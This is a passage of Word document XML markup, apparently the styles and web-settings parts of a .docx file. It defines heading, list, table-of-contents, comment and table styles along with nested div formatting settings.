        <w:tab w:val="center" w:pos="8038"/>
        <w:tab w:val="right" w:pos="8838"/>
      </w:tabs>
      <w:spacing w:before="40" w:after="101" w:line="353" w:lineRule="auto"/>
      <w:ind w:left="777"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="C00000"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0037326C"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="C00000"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Title"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00F0333E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman (Headings CS)"/>
      <w:iCs/>
      <w:caps/>
      <w:color w:val="C00000"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009A0911"/>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66441"/>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06A2"/>
    <w:rPr>
      <w:rFonts w:ascii="Open Sans" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Open Sans" w:cstheme="majorBidi"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="BC161C"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003F748C"/>
    <w:rPr>
      <w:rFonts w:ascii="Open Sans" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Open Sans" w:cstheme="majorBidi"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="C00000"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:rsid w:val="0037326C"/>
    <w:rPr>
      <w:rFonts w:ascii="Open Sans" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Open Sans" w:cstheme="majorBidi"/>
      <w:b/>
      <w:caps/>
      <w:color w:val="C00000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F0333E"/>
    <w:rPr>
      <w:rFonts w:ascii="Open Sans" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Open Sans" w:cs="Times New Roman (Headings CS)"/>
      <w:b/>
      <w:iCs/>
      <w:caps/>
      <w:color w:val="C00000"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="009A0911"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D5A83"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4419"/>
        <w:tab w:val="right" w:pos="8838"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004D5A83"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004D5A83"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4419"/>
        <w:tab w:val="right" w:pos="8838"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004D5A83"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Stratus">
    <w:name w:val="Stratus"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00DC0FCA"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans"/>
      <w:lang w:val="en-US"/>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rPr>
        <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        <w:b/>
        <w:sz w:val="22"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00FA1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413"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C2C12"/>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00C63988"/>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C1A99"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009C1A99"/>
    <w:pPr>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E449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90E"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="009208FC"/>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9208FC"/>
    <w:rPr>
      <w:rFonts w:ascii="Open Sans" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Open Sans" w:cstheme="majorBidi"/>
      <w:b/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid1">
    <w:name w:val="Table Grid1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="0091494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0C6C6B"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressLineNumbers/>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="WenQuanYi Micro Hei" w:hAnsi="Liberation Serif" w:cs="Lohit Hindi"/>
      <w:color w:val="000000"/>
      <w:kern w:val="3"/>
      <w:sz w:val="21"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009C1A99"/>
    <w:pPr>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBullet1">
    <w:name w:val="ListBullet1"/>
    <w:basedOn w:val="ListBullet20"/>
    <w:next w:val="ListBullet20"/>
    <w:qFormat/>
    <w:rsid w:val="003F6C7F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:after="100"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Calibri"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet20">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B010FA"/>
    <w:pPr>
      <w:ind w:left="1800" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBullet2">
    <w:name w:val="ListBullet2"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:qFormat/>
    <w:rsid w:val="003F6C7F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBullet3">
    <w:name w:val="ListBullet3"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:qFormat/>
    <w:rsid w:val="003F6C7F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber1">
    <w:name w:val="ListNumber1"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:qFormat/>
    <w:rsid w:val="00B72F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber2">
    <w:name w:val="ListNumber2"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:qFormat/>
    <w:rsid w:val="00B72F81"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="atLeast"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber3">
    <w:name w:val="ListNumber3"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:qFormat/>
    <w:rsid w:val="00B72F81"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="atLeast"/>
      <w:ind w:left="1620" w:hanging="180"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="MediumGrid1">
    <w:name w:val="Medium Grid 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="67"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B010FA"/>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auto"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
      </w:tc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paragraph" w:customStyle="1" w:styleId="ListNumber0">
    <w:name w:val="ListNumber0"/>
    <w:basedOn w:val="ListNumber1"/>
    <w:next w:val="ListNumber1"/>
    <w:qFormat/>
    <w:rsid w:val="00B72F81"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="IntenseQuote">
    <w:name w:val="IntenseQuote"/>
    <w:basedOn w:val="IntenseQuote0"/>
    <w:next w:val="IntenseQuote0"/>
    <w:qFormat/>
    <w:rsid w:val="00B010FA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote0">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00B010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0"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="00B010FA"/>
    <w:rPr>
      <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="5B9BD5" w:themeColor="accent1"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListBullet4">
    <w:name w:val="ListBullet4"/>
    <w:basedOn w:val="ListBullet3"/>
    <w:qFormat/>
    <w:rsid w:val="003F6C7F"/>
    <w:pPr>
      <w:ind w:left="1800"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ListNumber4">
    <w:name w:val="ListNumber4"/>
    <w:basedOn w:val="ListNumber3"/>
    <w:qFormat/>
    <w:rsid w:val="00B010FA"/>
    <w:pPr>
      <w:ind w:left="2520" w:hanging="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009C1A9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9C1A9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C1A9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C1A9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C1A9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C1A9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284200"/>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797A1E"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00797A1E"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00797A1E"/>
    <w:rPr>
      <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00797A1E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00797A1E"/>
    <w:rPr>
      <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00720C19"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C7C38"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C2C12"/>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00666441"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F4D78" w:themeColor="accent1" w:themeShade="7F"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002B10AF"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0066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29B4"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid0">
    <w:name w:val="TableGrid"/>
    <w:rsid w:val="00CB06BF"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C62258"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="56"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="360"/>
      </w:tabs>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:contextualSpacing/>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6080">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="35739123">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="45179226">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="65421962">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="66388349">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="73941159">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="600920974">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="992559920">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="565458772">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="10346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5806">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="81463172">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
